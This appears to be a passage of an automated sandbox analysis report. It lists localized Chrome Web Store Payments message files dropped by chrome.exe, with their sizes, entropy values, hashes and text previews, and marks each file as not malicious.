                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):624
                                                                                                                                                                      Entropy (8bit):4.5289746475384565
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                                      SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                                      SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                                      SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):651
                                                                                                                                                                      Entropy (8bit):4.583694000020627
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                                      SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                                      SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                                                                                                                                      SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):787
                                                                                                                                                                      Entropy (8bit):4.973349962793468
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                                      SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                                      SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                                      SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):593
                                                                                                                                                                      Entropy (8bit):4.483686991119526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                      SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                      SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                      SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):593
                                                                                                                                                                      Entropy (8bit):4.483686991119526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                      SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                      SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                      SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):661
                                                                                                                                                                      Entropy (8bit):4.450938335136508
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                                      SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                                      SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                                      SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):637
                                                                                                                                                                      Entropy (8bit):4.47253983486615
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                                      SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                                      SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                                      SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):595
                                                                                                                                                                      Entropy (8bit):4.467205425399467
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                                      SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                                      SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                                      SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):647
                                                                                                                                                                      Entropy (8bit):4.595421267152647
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                      SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                      SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                      SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):658
                                                                                                                                                                      Entropy (8bit):4.5231229502550745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                      SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                      SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                      SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):677
                                                                                                                                                                      Entropy (8bit):4.552569602149629
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                      SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                      SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                                      SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):835
                                                                                                                                                                      Entropy (8bit):4.791154467711985
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                      SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                      SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                      SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):618
                                                                                                                                                                      Entropy (8bit):4.56999230891419
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                      SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                      SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                      SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):683
                                                                                                                                                                      Entropy (8bit):4.675370843321512
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                      SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                      SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                      SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):604
                                                                                                                                                                      Entropy (8bit):4.465685261172395
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                      SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                      SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                      SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):603
                                                                                                                                                                      Entropy (8bit):4.479418964635223
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                      SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                      SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                      SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):697
                                                                                                                                                                      Entropy (8bit):5.20469020877498
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                      SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                      SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                      SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):631
                                                                                                                                                                      Entropy (8bit):5.160315577642469
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                      SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                                      SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                      SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):665
                                                                                                                                                                      Entropy (8bit):4.66839186029557
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                      SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                                      SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                      SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):671
                                                                                                                                                                      Entropy (8bit):4.631774066483956
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                      SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                      SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                      SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
